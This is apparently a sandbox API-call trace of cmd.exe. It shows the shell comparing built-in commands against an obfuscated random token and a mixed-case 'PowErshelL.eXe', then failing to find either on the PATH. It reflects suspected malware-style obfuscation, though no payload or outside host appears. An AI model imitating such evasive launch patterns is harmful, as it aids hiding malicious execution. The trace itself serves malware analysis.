	[0051.171] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x30) returned 0x3469a0
	[0051.171] GetProcessHeap () returned 0x330000
	[0051.171] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x14) returned 0x348d80
	[0051.171] GetProcessHeap () returned 0x330000
	[0051.171] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0xb0) returned 0x34a240
	[0051.185] _wcsicmp (_String1="PowErshelL.eXe", _String2=")") returned 71
	[0051.185] _wcsicmp (_String1="FOR", _String2="PowErshelL.eXe") returned -10
	[0051.185] _wcsicmp (_String1="FOR/?", _String2="PowErshelL.eXe") returned -10
	[0051.185] _wcsicmp (_String1="IF", _String2="PowErshelL.eXe") returned -7
	[0051.185] _wcsicmp (_String1="IF/?", _String2="PowErshelL.eXe") returned -7
	[0051.185] _wcsicmp (_String1="REM", _String2="PowErshelL.eXe") returned 2
	[0051.185] _wcsicmp (_String1="REM/?", _String2="PowErshelL.eXe") returned 2
	[0051.185] GetProcessHeap () returned 0x330000
	[0051.185] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0xb0) returned 0x34a300
	[0051.185] GetProcessHeap () returned 0x330000
	[0051.185] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x2e) returned 0x3469e0
	[0051.189] GetConsoleTitleW (in: lpConsoleTitle=0x13f720, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0051.190] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="DIR") returned 19
	[0051.190] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="ERASE") returned 18
	[0051.190] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="DEL") returned 19
	[0051.190] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="TYPE") returned 3
	[0051.190] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="COPY") returned 20
	[0051.190] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="CD") returned 20
	[0051.190] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="CHDIR") returned 20
	[0051.190] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="RENAME") returned 5
	[0051.190] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="REN") returned 5
	[0051.190] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="ECHO") returned 18
	[0051.190] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="SET") returned 4
	[0051.190] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="PAUSE") returned 7
	[0051.190] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="DATE") returned 19
	[0051.190] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="TIME") returned 3
	[0051.191] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="PROMPT") returned 7
	[0051.191] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="MD") returned 10
	[0051.191] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="MKDIR") returned 10
	[0051.191] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="RD") returned 5
	[0051.191] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="RMDIR") returned 5
	[0051.191] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="PATH") returned 7
	[0051.191] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="GOTO") returned 16
	[0051.191] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="SHIFT") returned 4
	[0051.191] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="CLS") returned 20
	[0051.191] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="CALL") returned 20
	[0051.191] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="VERIFY") returned 1
	[0051.191] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="VER") returned 1
	[0051.191] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="VOL") returned 1
	[0051.191] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="EXIT") returned 18
	[0051.191] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="SETLOCAL") returned 4
	[0051.191] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="ENDLOCAL") returned 18
	[0051.191] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="TITLE") returned 3
	[0051.191] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="START") returned 4
	[0051.191] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="DPATH") returned 19
	[0051.191] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="KEYS") returned 12
	[0051.191] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="MOVE") returned 10
	[0051.191] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="PUSHD") returned 7
	[0051.191] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="POPD") returned 7
	[0051.191] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="ASSOC") returned 22
	[0051.191] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="FTYPE") returned 17
	[0051.191] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="BREAK") returned 21
	[0051.191] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="COLOR") returned 20
	[0051.191] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="MKLINK") returned 10
	[0051.191] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="DIR") returned 19
	[0051.191] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="ERASE") returned 18
	[0051.191] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="DEL") returned 19
	[0051.191] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="TYPE") returned 3
	[0051.191] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="COPY") returned 20
	[0051.191] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="CD") returned 20
	[0051.192] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="CHDIR") returned 20
	[0051.192] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="RENAME") returned 5
	[0051.192] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="REN") returned 5
	[0051.192] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="ECHO") returned 18
	[0051.192] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="SET") returned 4
	[0051.192] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="PAUSE") returned 7
	[0051.192] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="DATE") returned 19
	[0051.192] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="TIME") returned 3
	[0051.192] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="PROMPT") returned 7
	[0051.192] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="MD") returned 10
	[0051.192] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="MKDIR") returned 10
	[0051.192] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="RD") returned 5
	[0051.192] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="RMDIR") returned 5
	[0051.192] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="PATH") returned 7
	[0051.192] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="GOTO") returned 16
	[0051.192] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="SHIFT") returned 4
	[0051.192] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="CLS") returned 20
	[0051.192] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="CALL") returned 20
	[0051.192] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="VERIFY") returned 1
	[0051.192] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="VER") returned 1
	[0051.192] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="VOL") returned 1
	[0051.192] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="EXIT") returned 18
	[0051.192] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="SETLOCAL") returned 4
	[0051.192] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="ENDLOCAL") returned 18
	[0051.192] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="TITLE") returned 3
	[0051.192] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="START") returned 4
	[0051.192] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="DPATH") returned 19
	[0051.192] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="KEYS") returned 12
	[0051.192] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="MOVE") returned 10
	[0051.192] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="PUSHD") returned 7
	[0051.192] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="POPD") returned 7
	[0051.192] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="ASSOC") returned 22
	[0051.192] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="FTYPE") returned 17
	[0051.192] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="BREAK") returned 21
	[0051.192] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="COLOR") returned 20
	[0051.192] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="MKLINK") returned 10
	[0051.193] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="FOR") returned 17
	[0051.193] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="IF") returned 14
	[0051.193] _wcsicmp (_String1="WNjKdpGDFcPRHnV", _String2="REM") returned 5
	[0051.193] GetProcessHeap () returned 0x330000
	[0051.193] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x218) returned 0x331800
	[0051.193] GetProcessHeap () returned 0x330000
	[0051.193] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x34) returned 0x346a60
	[0051.193] _wcsnicmp (_String1="WNjK", _String2="cmd ", _MaxCount=0x4) returned 20
	[0051.194] GetProcessHeap () returned 0x330000
	[0051.194] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x420) returned 0x34afd0
	[0051.194] SetErrorMode (uMode=0x0) returned 0x0
	[0051.194] SetErrorMode (uMode=0x1) returned 0x0
	[0051.194] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x34afe0, lpFilePart=0x13efb0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x13efb0*="Documents") returned 0x1b
	[0051.194] SetErrorMode (uMode=0x0) returned 0x1
	[0051.194] GetProcessHeap () returned 0x330000
	[0051.194] RtlReAllocateHeap (Heap=0x330000, Flags=0x0, Ptr=0x34afd0, Size=0x68) returned 0x34afd0
	[0051.194] GetProcessHeap () returned 0x330000
	[0051.194] RtlSizeHeap (HeapHandle=0x330000, Flags=0x0, MemoryPointer=0x34afd0) returned 0x68
	[0051.194] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0x91
	[0051.194] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0051.194] GetProcessHeap () returned 0x330000
	[0051.194] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x170) returned 0x331a20
	[0051.194] GetProcessHeap () returned 0x330000
	[0051.194] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x2d0) returned 0x34b050
	[0051.199] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0051.199] GetProcessHeap () returned 0x330000
	[0051.199] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0xe8) returned 0x331ba0
	[0051.200] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0051.201] FindFirstFileExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\WNjKdpGDFcPRHnV.*", fInfoLevelId=0x1, lpFindFileData=0x13ed20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x13ed20) returned 0xffffffffffffffff
	[0051.201] GetLastError () returned 0x2
	[0051.201] FindFirstFileExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\WNjKdpGDFcPRHnV", fInfoLevelId=0x1, lpFindFileData=0x13ed20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x13ed20) returned 0xffffffffffffffff
	[0051.201] GetLastError () returned 0x2
	[0051.202] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0051.202] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WNjKdpGDFcPRHnV.*", fInfoLevelId=0x1, lpFindFileData=0x13ed20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x13ed20) returned 0xffffffffffffffff
	[0051.202] GetLastError () returned 0x2
	[0051.202] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WNjKdpGDFcPRHnV", fInfoLevelId=0x1, lpFindFileData=0x13ed20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x13ed20) returned 0xffffffffffffffff
	[0051.202] GetLastError () returned 0x2
	[0051.203] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0051.203] FindFirstFileExW (in: lpFileName="C:\\Windows\\WNjKdpGDFcPRHnV.*", fInfoLevelId=0x1, lpFindFileData=0x13ed20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x13ed20) returned 0xffffffffffffffff
	[0051.203] GetLastError () returned 0x2
	[0051.203] FindFirstFileExW (in: lpFileName="C:\\Windows\\WNjKdpGDFcPRHnV", fInfoLevelId=0x1, lpFindFileData=0x13ed20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x13ed20) returned 0xffffffffffffffff
	[0051.203] GetLastError () returned 0x2
	[0051.204] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0051.204] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WNjKdpGDFcPRHnV.*", fInfoLevelId=0x1, lpFindFileData=0x13ed20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x13ed20) returned 0xffffffffffffffff
	[0051.204] GetLastError () returned 0x2
	[0051.204] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WNjKdpGDFcPRHnV", fInfoLevelId=0x1, lpFindFileData=0x13ed20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x13ed20) returned 0xffffffffffffffff
	[0051.204] GetLastError () returned 0x2
	[0051.205] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0051.205] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WNjKdpGDFcPRHnV.*", fInfoLevelId=0x1, lpFindFileData=0x13ed20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x13ed20) returned 0xffffffffffffffff
	[0051.206] GetLastError () returned 0x2
	[0051.206] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WNjKdpGDFcPRHnV", fInfoLevelId=0x1, lpFindFileData=0x13ed20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x13ed20) returned 0xffffffffffffffff
	[0051.207] GetLastError () returned 0x2
	[0051.207] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0051.208] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client\\WNjKdpGDFcPRHnV.*", fInfoLevelId=0x1, lpFindFileData=0x13ed20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x13ed20) returned 0xffffffffffffffff
	[0051.209] GetLastError () returned 0x2
	[0051.209] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Client\\WNjKdpGDFcPRHnV", fInfoLevelId=0x1, lpFindFileData=0x13ed20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x13ed20) returned 0xffffffffffffffff
	[0051.210] GetLastError () returned 0x2
	[0051.210] _get_osfhandle (_FileHandle=2) returned 0xb
	[0051.210] GetFileType (hFile=0xb) returned 0x2
	[0051.258] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb
	[0051.258] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x13f178 | out: lpMode=0x13f178) returned 1
	[0051.258] _get_osfhandle (_FileHandle=2) returned 0xb
	[0051.258] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x13f1b0 | out: lpConsoleScreenBufferInfo=0x13f1b0) returned 1
	[0051.259] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0x4ac96340, nSize=0x2000, Arguments=0x0 | out: lpBuffer="'%1' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x5d
	[0051.261] GetConsoleTitleW (in: lpConsoleTitle=0x13f660, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0051.261] GetFileAttributesW (lpFileName="PowErshelL.eXe" (normalized: "c:\\users\\aetadzjz\\documents\\powershell.exe")) returned 0xffffffff
	[0051.261] _wcsicmp (_String1="PowErshelL", _String2="DIR") returned 12
	[0051.261] _wcsicmp (_String1="PowErshelL", _String2="ERASE") returned 11
	[0051.261] _wcsicmp (_String1="PowErshelL", _String2="DEL") returned 12
	[0051.261] _wcsicmp (_String1="PowErshelL", _String2="TYPE") returned -4
	[0051.261] _wcsicmp (_String1="PowErshelL", _String2="COPY") returned 13
	[0051.261] _wcsicmp (_String1="PowErshelL", _String2="CD") returned 13
	[0051.261] _wcsicmp (_String1="PowErshelL", _String2="CHDIR") returned 13
	[0051.261] _wcsicmp (_String1="PowErshelL", _String2="RENAME") returned -2
	[0051.261] _wcsicmp (_String1="PowErshelL", _String2="REN") returned -2
	[0051.261] _wcsicmp (_String1="PowErshelL", _String2="ECHO") returned 11
	[0051.261] _wcsicmp (_String1="PowErshelL", _String2="SET") returned -3
	[0051.261] _wcsicmp (_String1="PowErshelL", _String2="PAUSE") returned 14
	[0051.262] _wcsicmp (_String1="PowErshelL", _String2="DATE") returned 12
	[0051.262] _wcsicmp (_String1="PowErshelL", _String2="TIME") returned -4
	[0051.262] _wcsicmp (_String1="PowErshelL", _String2="PROMPT") returned -3
	[0051.262] _wcsicmp (_String1="PowErshelL", _String2="MD") returned 3
	[0051.262] _wcsicmp (_String1="PowErshelL", _String2="MKDIR") returned 3
	[0051.262] _wcsicmp (_String1="PowErshelL", _String2="RD") returned -2
	[0051.262] _wcsicmp (_String1="PowErshelL", _String2="RMDIR") returned -2
	[0051.262] _wcsicmp (_String1="PowErshelL", _String2="PATH") returned 14
	[0051.262] _wcsicmp (_String1="PowErshelL", _String2="GOTO") returned 9
	[0051.262] _wcsicmp (_String1="PowErshelL", _String2="SHIFT") returned -3
	[0051.262] _wcsicmp (_String1="PowErshelL", _String2="CLS") returned 13
	[0051.262] _wcsicmp (_String1="PowErshelL", _String2="CALL") returned 13
	[0051.262] _wcsicmp (_String1="PowErshelL", _String2="VERIFY") returned -6
	[0051.262] _wcsicmp (_String1="PowErshelL", _String2="VER") returned -6
	[0051.262] _wcsicmp (_String1="PowErshelL", _String2="VOL") returned -6
	[0051.262] _wcsicmp (_String1="PowErshelL", _String2="EXIT") returned 11
	[0051.262] _wcsicmp (_String1="PowErshelL", _String2="SETLOCAL") returned -3
	[0051.262] _wcsicmp (_String1="PowErshelL", _String2="ENDLOCAL") returned 11
	[0051.262] _wcsicmp (_String1="PowErshelL", _String2="TITLE") returned -4
	[0051.262] _wcsicmp (_String1="PowErshelL", _String2="START") returned -3
	[0051.262] _wcsicmp (_String1="PowErshelL", _String2="DPATH") returned 12
	[0051.262] _wcsicmp (_String1="PowErshelL", _String2="KEYS") returned 5
	[0051.262] _wcsicmp (_String1="PowErshelL", _String2="MOVE") returned 3
	[0051.262] _wcsicmp (_String1="PowErshelL", _String2="PUSHD") returned -6
	[0051.262] _wcsicmp (_String1="PowErshelL", _String2="POPD") returned 7
	[0051.262] _wcsicmp (_String1="PowErshelL", _String2="ASSOC") returned 15
	[0051.262] _wcsicmp (_String1="PowErshelL", _String2="FTYPE") returned 10
	[0051.262] _wcsicmp (_String1="PowErshelL", _String2="BREAK") returned 14
	[0051.262] _wcsicmp (_String1="PowErshelL", _String2="COLOR") returned 13
	[0051.262] _wcsicmp (_String1="PowErshelL", _String2="MKLINK") returned 3
	[0051.262] _wcsicmp (_String1="PowErshelL", _String2="DIR") returned 12
	[0051.262] _wcsicmp (_String1="PowErshelL", _String2="ERASE") returned 11
	[0051.262] _wcsicmp (_String1="PowErshelL", _String2="DEL") returned 12
	[0051.262] _wcsicmp (_String1="PowErshelL", _String2="TYPE") returned -4
	[0051.262] _wcsicmp (_String1="PowErshelL", _String2="COPY") returned 13
	[0051.262] _wcsicmp (_String1="PowErshelL", _String2="CD") returned 13
	[0051.262] _wcsicmp (_String1="PowErshelL", _String2="CHDIR") returned 13
	[0051.263] _wcsicmp (_String1="PowErshelL", _String2="RENAME") returned -2
	[0051.263] _wcsicmp (_String1="PowErshelL", _String2="REN") returned -2
	[0051.263] _wcsicmp (_String1="PowErshelL", _String2="ECHO") returned 11
	[0051.263] _wcsicmp (_String1="PowErshelL", _String2="SET") returned -3
	[0051.263] _wcsicmp (_String1="PowErshelL", _String2="PAUSE") returned 14
	[0051.263] _wcsicmp (_String1="PowErshelL", _String2="DATE") returned 12
	[0051.263] _wcsicmp (_String1="PowErshelL", _String2="TIME") returned -4
	[0051.263] _wcsicmp (_String1="PowErshelL", _String2="PROMPT") returned -3
	[0051.263] _wcsicmp (_String1="PowErshelL", _String2="MD") returned 3
	[0051.263] _wcsicmp (_String1="PowErshelL", _String2="MKDIR") returned 3
	[0051.263] _wcsicmp (_String1="PowErshelL", _String2="RD") returned -2
	[0051.263] _wcsicmp (_String1="PowErshelL", _String2="RMDIR") returned -2
	[0051.263] _wcsicmp (_String1="PowErshelL", _String2="PATH") returned 14
	[0051.263] _wcsicmp (_String1="PowErshelL", _String2="GOTO") returned 9
	[0051.263] _wcsicmp (_String1="PowErshelL", _String2="SHIFT") returned -3
	[0051.263] _wcsicmp (_String1="PowErshelL", _String2="CLS") returned 13
	[0051.263] _wcsicmp (_String1="PowErshelL", _String2="CALL") returned 13
	[0051.263] _wcsicmp (_String1="PowErshelL", _String2="VERIFY") returned -6
	[0051.263] _wcsicmp (_String1="PowErshelL", _String2="VER") returned -6
	[0051.263] _wcsicmp (_String1="PowErshelL", _String2="VOL") returned -6
	[0051.263] _wcsicmp (_String1="PowErshelL", _String2="EXIT") returned 11
	[0051.263] _wcsicmp (_String1="PowErshelL", _String2="SETLOCAL") returned -3
	[0051.263] _wcsicmp (_String1="PowErshelL", _String2="ENDLOCAL") returned 11
	[0051.263] _wcsicmp (_String1="PowErshelL", _String2="TITLE") returned -4
	[0051.263] _wcsicmp (_String1="PowErshelL", _String2="START") returned -3
	[0051.263] _wcsicmp (_String1="PowErshelL", _String2="DPATH") returned 12
	[0051.263] _wcsicmp (_String1="PowErshelL", _String2="KEYS") returned 5
	[0051.263] _wcsicmp (_String1="PowErshelL", _String2="MOVE") returned 3
	[0051.263] _wcsicmp (_String1="PowErshelL", _String2="PUSHD") returned -6
	[0051.263] _wcsicmp (_String1="PowErshelL", _String2="POPD") returned 7
	[0051.263] _wcsicmp (_String1="PowErshelL", _String2="ASSOC") returned 15
	[0051.263] _wcsicmp (_String1="PowErshelL", _String2="FTYPE") returned 10
	[0051.263] _wcsicmp (_String1="PowErshelL", _String2="BREAK") returned 14
	[0051.263] _wcsicmp (_String1="PowErshelL", _String2="COLOR") returned 13
	[0051.263] _wcsicmp (_String1="PowErshelL", _String2="MKLINK") returned 3
	[0051.263] _wcsicmp (_String1="PowErshelL", _String2="FOR") returned 10
	[0051.263] _wcsicmp (_String1="PowErshelL", _String2="IF") returned 7
	[0051.264] _wcsicmp (_String1="PowErshelL", _String2="REM") returned -2
	[0051.264] SetErrorMode (uMode=0x0) returned 0x0
	[0051.264] SetErrorMode (uMode=0x1) returned 0x0
	[0051.264] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x34b640, lpFilePart=0x13eef0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x13eef0*="Documents") returned 0x1b
	[0051.264] SetErrorMode (uMode=0x0) returned 0x1
	[0051.264] GetProcessHeap () returned 0x330000
	[0051.264] RtlReAllocateHeap (Heap=0x330000, Flags=0x0, Ptr=0x34b630, Size=0x66) returned 0x34b630
	[0051.264] GetProcessHeap () returned 0x330000
	[0051.264] RtlSizeHeap (HeapHandle=0x330000, Flags=0x0, MemoryPointer=0x34b630) returned 0x66
	[0051.264] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0x91
	[0051.264] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0051.264] GetProcessHeap () returned 0x330000
	[0051.264] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x170) returned 0x331c30
	[0051.264] GetProcessHeap () returned 0x330000
	[0051.264] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0x2d0) returned 0x34b6b0
	[0051.264] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ac7f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0051.264] GetProcessHeap () returned 0x330000
	[0051.265] RtlAllocateHeap (HeapHandle=0x330000, Flags=0x8, Size=0xe8) returned 0x34b840
	[0051.265] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0051.265] FindFirstFileExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\PowErshelL.eXe", fInfoLevelId=0x1, lpFindFileData=0x13ec60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x13ec60) returned 0xffffffffffffffff
	[0051.265] GetLastError () returned 0x2
	[0051.265] FindFirstFileExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\PowErshelL.eXe.*", fInfoLevelId=0x1, lpFindFileData=0x13ec60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x13ec60) returned 0xffffffffffffffff
	[0051.266] GetLastError () returned 0x2
	[0051.266] FindFirstFileExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\PowErshelL.eXe", fInfoLevelId=0x1, lpFindFileData=0x13ec60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x13ec60) returned 0xffffffffffffffff
	[0051.266] GetLastError () returned 0x2
	[0051.266] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0051.266] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PowErshelL.eXe", fInfoLevelId=0x1, lpFindFileData=0x13ec60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x13ec60) returned 0xffffffffffffffff
	[0051.267] GetLastError () returned 0x2
	[0051.267] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PowErshelL.eXe.*", fInfoLevelId=0x1, lpFindFileData=0x13ec60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x13ec60) returned 0xffffffffffffffff
	[0051.267] GetLastError () returned 0x2
	[0051.267] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PowErshelL.eXe", fInfoLevelId=0x1, lpFindFileData=0x13ec60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x13ec60) returned 0xffffffffffffffff
	[0051.267] GetLastError () returned 0x2
	[0051.267] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0051.268] FindFirstFileExW (in: lpFileName="C:\\Windows\\PowErshelL.eXe", fInfoLevelId=0x1, lpFindFileData=0x13ec60, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x13ec60) returned 0xffffffffffffffff
	[0051.268] GetLastError () returned 0x2
